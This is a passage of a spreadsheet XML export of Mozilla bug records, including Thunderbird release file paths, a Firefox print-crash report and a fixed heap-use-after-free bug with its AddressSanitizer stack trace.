Thunderbird-3.3a3                     linux   /thunderbird/releases/3.3a3/linux-i686/:lang/miramar-3.3a3.tar.bz2
Thunderbird-3.3a3                     linux64 /thunderbird/releases/3.3a3/linux-x86_64/:lang/miramar-3.3a3.tar.bz2
Thunderbird-3.3a3                     win     /thunderbird/releases/3.3a3/win32/:lang/Miramar%20Setup%203.3%20Alpha%203.exe
Thunderbird-3.3a3-Complete            osx     /thunderbird/releases/3.3a3/update/mac/:lang/miramar-3.3a3.complete.mar
Thunderbird-3.3a3-Complete            linux   /thunderbird/releases/3.3a3/update/linux-i686/:lang/miramar-3.3a3.complete.mar
Thunderbird-3.3a3-Complete            linux64 /thunderbird/releases/3.3a3/update/linux-x86_64/:lang/miramar-3.3a3.complete.mar
Thunderbird-3.3a3-Complete            win     /thunderbird/releases/3.3a3/update/win32/:lang/miramar-3.3a3.complete.mar
Thunderbird-3.3a3-Partial-3.3a2  osx     /thunderbird/releases/3.3a3/update/mac/:lang/miramar-3.3a2-3.3a3.partial.mar
Thunderbird-3.3a3-Partial-3.3a2  linux   /thunderbird/releases/3.3a3/update/linux-i686/:lang/miramar-3.3a2-3.3a3.partial.mar
Thunderbird-3.3a3-Partial-3.3a2  linux64 /thunderbird/releases/3.3a3/update/linux-x86_64/:lang/miramar-3.3a2-3.3a3.partial.mar
Thunderbird-3.3a3-Partial-3.3a2  win     /thunderbird/releases/3.3a3/update/win32/:lang/miramar-3.3a2-3.3a3.partial.mar</t>
        </is>
      </c>
      <c r="X440" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="441">
      <c r="A441" t="n">
        <v>1811852</v>
      </c>
      <c r="B441" t="inlineStr">
        <is>
          <t>2023-01-23 06:37:16 -0800</t>
        </is>
      </c>
      <c r="C441" t="inlineStr">
        <is>
          <t>Firefox crashes on Windows when printing a page (sometimes)</t>
        </is>
      </c>
      <c r="D441" t="inlineStr">
        <is>
          <t>2024-06-02 11:56:30 -0700</t>
        </is>
      </c>
      <c r="E441" t="n">
        <v>1</v>
      </c>
      <c r="F441" t="n">
        <v>1</v>
      </c>
      <c r="G441" t="n">
        <v>3</v>
      </c>
      <c r="H441" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I441" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J441" t="inlineStr">
        <is>
          <t>Printing</t>
        </is>
      </c>
      <c r="K441" t="inlineStr">
        <is>
          <t>Firefox 109</t>
        </is>
      </c>
      <c r="L441" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M441" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N441" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O441" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P441" t="inlineStr">
        <is>
          <t>[adv-main110+][adv-esr102.8+]</t>
        </is>
      </c>
      <c r="Q441" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R441" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S441" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T441" t="n">
        <v>1</v>
      </c>
      <c r="U441" t="n">
        <v>0</v>
      </c>
      <c r="V441" t="n">
        <v>53</v>
      </c>
      <c r="W441" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Steps to reproduce:
Visit a long URL, such as: https://crm1.mozilla.com/survey.php?firstname=Lisa&amp;lastname=Smith&amp;assignedto=Town&amp;postcode=NE1%202AE&amp;telephonehome=07777754&amp;email=lisasmith@hotmail.co.uk&amp;address1=13%20Front%20Street&amp;city=Newcastle&amp;source=Search%20Engine%20(Google,%20Yahoo%20etc)&amp;surveydate=2023-01-25T14:00
(I've used fake data above, but can provide a real URL if you need).
Then click print, print dialogue box shows up, then firefox crashes.
Actual results:
Browser crashes fully. All windows and tabs close.
Expected results:
Browser should print the page.</t>
        </is>
      </c>
      <c r="X441" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="442">
      <c r="A442" t="n">
        <v>1309198</v>
      </c>
      <c r="B442" t="inlineStr">
        <is>
          <t>2016-10-11 04:30:43 -0700</t>
        </is>
      </c>
      <c r="C442" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::dom::Element::GetAnimations</t>
        </is>
      </c>
      <c r="D442" t="inlineStr">
        <is>
          <t>2024-05-30 09:22:24 -0700</t>
        </is>
      </c>
      <c r="E442" t="n">
        <v>1</v>
      </c>
      <c r="F442" t="n">
        <v>1</v>
      </c>
      <c r="G442" t="n">
        <v>3</v>
      </c>
      <c r="H442" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I442" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J442" t="inlineStr">
        <is>
          <t>DOM: Animation</t>
        </is>
      </c>
      <c r="K442" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L442" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M442" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N442" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O442" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P442" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+]</t>
        </is>
      </c>
      <c r="Q442" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R442" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S442" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T442" t="n">
        <v>1</v>
      </c>
      <c r="U442" t="n">
        <v>0</v>
      </c>
      <c r="V442" t="n">
        <v>34</v>
      </c>
      <c r="W442" t="inlineStr">
        <is>
          <t>Created attachment 8799713
crash.html minimized testcase: requires Jesse's dom fuzzing addon
The attached testcases crashes the latest ASAN build of Firefox (BuildID=20161010095556) as follows. It requires Jesse's fuzzPriv extension to reproduce reliably.
ASAN output:
=================================================================
==936==ERROR: AddressSanitizer: heap-use-after-free on address 0x60f0000a6318 at pc 0x7f16979d2e9f bp 0x7ffc3623fcb0 sp 0x7ffc3623fca8
READ of size 4 at 0x60f0000a6318 thread T0 (Web Content)
    #0 0x7f16979d2e9e in HasFlag /home/worker/workspace/build/src/dom/base/nsWrapperCache.h:210:15
    #1 0x7f16979d2e9e in IsRootOfNativeAnonymousSubtree /home/worker/workspace/build/src/dom/base/nsIContent.h:174
    #2 0x7f16979d2e9e in IsGeneratedContentContainerForBefore /home/worker/workspace/build/src/dom/base/nsIContent.h:332
    #3 0x7f16979d2e9e in mozilla::dom::Element::GetAnimations(mozilla::dom::AnimationFilter const&amp;, nsTArray&lt;RefPtr&lt;mozilla::dom::Animation&gt; &gt;&amp;) /home/worker/workspace/build/src/dom/base/Element.cpp:3460
    #4 0x7f1697bb046b in nsDocument::GetAnimations(nsTArray&lt;RefPtr&lt;mozilla::dom::Animation&gt; &gt;&amp;) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:3032:3
    #5 0x7f169956d2c8 in mozilla::dom::DocumentBinding::getAnimations(JSContext*, JS::Handle&lt;JSObject*&gt;, nsIDocument*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:4247:3
    #6 0x7f16999f6460 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2825:13
    #7 0x7f169fc301a5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #8 0x7f169fc301a5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #9 0x7f169fc30e52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #10 0x7f169fa519bc in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #11 0x7f169f99b92f in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #12 0x7f169f9a9c6f in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #13 0x7f169f9ac62e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #14 0x7f169fc301a5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #15 0x7f169fc301a5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #16 0x7f169fc10956 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:509:12
    #17 0x7f169fc10956 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #18 0x7f169fbf5c5b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #19 0x7f169fc3080f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
    #20 0x7f169fc30e52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #21 0x7f169f7358cd in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2825:12
    #22 0x7f1699527852 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #23 0x7f1699e4ec41 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #24 0x7f1699e4ec41 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #25 0x7f1699e1af44 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
    #26 0x7f1699e1c50f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
    #27 0x7f1699e06806 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #28 0x7f1699e0a86d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #29 0x7f169c080055 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:998:7
    #30 0x7f169cdfa1de in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7615:5
    #31 0x7f169cdf5fb4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7415:7
    #32 0x7f169cdfd57f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7312:13
    #33 0x7f1696c786a0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #34 0x7f1696c77668 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #35 0x7f1696c7441c in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #36 0x7f1696c764f4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #37 0x7f1696c7707c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #38 0x7f1695012f8b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #39 0x7f1697bf360f in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8625:7
    #40 0x7f1697ccb9ff in nsUnblockOnloadEvent::Run() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8578:5
    #41 0x7f1694e3939d in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1082:7
    #42 0x7f1694eb8c1c in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #43 0x7f1695c1660f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #44 0x7f1695b883b8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #45 0x7f1695b883b8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #46 0x7f1695b883b8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #47 0x7f169b7aa46f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #48 0x7f169d9012c7 in XRE_RunAppShell /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:869:12
    #49 0x7f1695b883b8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #50 0x7f1695b883b8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #51 0x7f1695b883b8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #52 0x7f169d900803 in XRE_InitChildProcess /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:701:7
    #53 0x4dfb2b in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:197:19
    #54 0x4dfb2b in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:392
    #55 0x7f16b05b082f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #56 0x41ba08 in _start (/home/nils/fuzzer3/firefox/firefox+0x41ba08)
0x60f0000a6318 is located 24 bytes inside of 176-byte region [0x60f0000a6300,0x60f0000a63b0)
freed by thread T0 (Web Content) here:
    #0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f1694d13574 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2665:9
    #2 0x7f1694d13166 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2840:3
    #3 0x7f1694d1985c in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3826:3
    #4 0x7f1694d1903c in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3651:9
    #5 0x7f1694d1c216 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4144:3
    #6 0x7f1697cda939 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1440:3
    #7 0x7f169782615d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1338:3
    #8 0x7f1694e5fe36 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
    #9 0x7f1696840cee in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2064:12
    #10 0x7f1696840cee in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1383
    #11 0x7f1696840cee in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1350
    #12 0x7f169684847b in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1143:12
    #13 0x7f169fc301a5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #14 0x7f169fc301a5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #15 0x7f169fc10956 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:509:12
    #16 0x7f169fc10956 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #17 0x7f169fbf5c5b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #18 0x7f169fc3080f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
    #19 0x7f169fc30e52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #20 0x7f169f732fdd in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2766:12
    #21 0x7f1696779e2f in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:353:18
    #22 0x7f169fc301a5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #23 0x7f169fc301a5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #24 0x7f169fc10956 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:509:12
    #25 0x7f169fc10956 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #26 0x7f169fbf5c5b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #27 0x7f169fc3080f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
    #28 0x7f169fc30e52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #29 0x7f169f7358cd in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2825:12
    #30 0x7f1699529925 in mozilla::dom::OnErrorEventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::EventOrString const&amp;, mozilla::dom::Optional&lt;nsAString_internal&gt; const&amp;, mozilla::dom::Optional&lt;unsigned int&gt; const&amp;, mozilla::dom::Optional&lt;unsigned int&gt; const&amp;, mozilla::dom::Optional&lt;JS::Handle&lt;JS::Value&gt; &gt; const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:389:37
    #31 0x7f1699e4f6a0 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:527:12
    #32 0x7f1699e4f6a0 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:166
    #33 0x7f1699e1af44 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
    #34 0x7f1699e1c50f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
    #35 0x7f1699e06806 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #36 0x7f1699e0a86d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
previously allocated by thread T0 (Web Content) here:
    #0 0x4b247b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0d6d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f169a146183 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f169a146183 in NS_NewHTMLSharedElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLSharedElement.cpp:23
    #4 0x7f169c898598 in NS_NewHTMLHtmlElement /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.h:1686:1
    #5 0x7f169c898598 in nsContentDLF::CreateBlankDocument(nsILoadGroup*, nsIPrincipal*, nsIDocument**) /home/worker/workspace/build/src/layout/build/nsContentDLF.cpp:298
    #6 0x7f169ce00306 in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIURI*, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8075:5
    #7 0x7f169cd9f9f3 in nsDocShell::EnsureContentViewer() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7965:17
    #8 0x7f169cdd3687 in GetDocument /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4528:3
    #9 0x7f169cdd3687 in non-virtual thunk to nsDocShell::GetDocument() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4526
    #10 0x7f169786b8ed in MaybeCreateDoc /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3633:38
    #11 0x7f169786b8ed in GetDoc /home/worker/workspace/build/src/obj-firefox/dist/include/nsPIDOMWindow.h:181
    #12 0x7f169786b8ed in EnsureInnerWindow /home/worker/workspace/build/src/obj-firefox/dist/include/nsPIDOMWindow.h:849
    #13 0x7f169786b8ed in nsOuterWindowProxy::GetSubframeWindow(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, bool&amp;) const /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:1063
    #14 0x7f169786d2bc in nsOuterWindowProxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:1002:8
    #15 0x7f169f9a761e in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:309:12
    #16 0x7f169fa50d80 in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1497:16
    #17 0x7f169fa50d80 in js::Wrapper::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:143
    #18 0x7f169f998f22 in js::CrossCompartmentWrapper::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:209:14
    #19 0x7f169f9a761e in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:309:12
    #20 0x7f169fca1d76 in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1497:16
    #21 0x7f169fca1d76 in js::GetElement(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, unsigned int, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsobjinlines.h:200
    #22 0x7f169fc11ee9 in GetElement /home/worker/workspace/build/src/js/src/jsobjinlines.h:208:12
    #23 0x7f169fc11ee9 in GetObjectElementOperation /home/worker/workspace/build/src/js/src/vm/Interpreter-inl.h:436
    #24 0x7f169fc11ee9 in GetElementOperation /home/worker/workspace/build/src/js/src/vm/Interpreter-inl.h:563
    #25 0x7f169fc11ee9 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2760
    #26 0x7f169fbf5c5b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #27 0x7f169fc3080f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
    #28 0x7f169fc30e52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #29 0x7f169f7358cd in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2825:12
    #30 0x7f1699527852 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
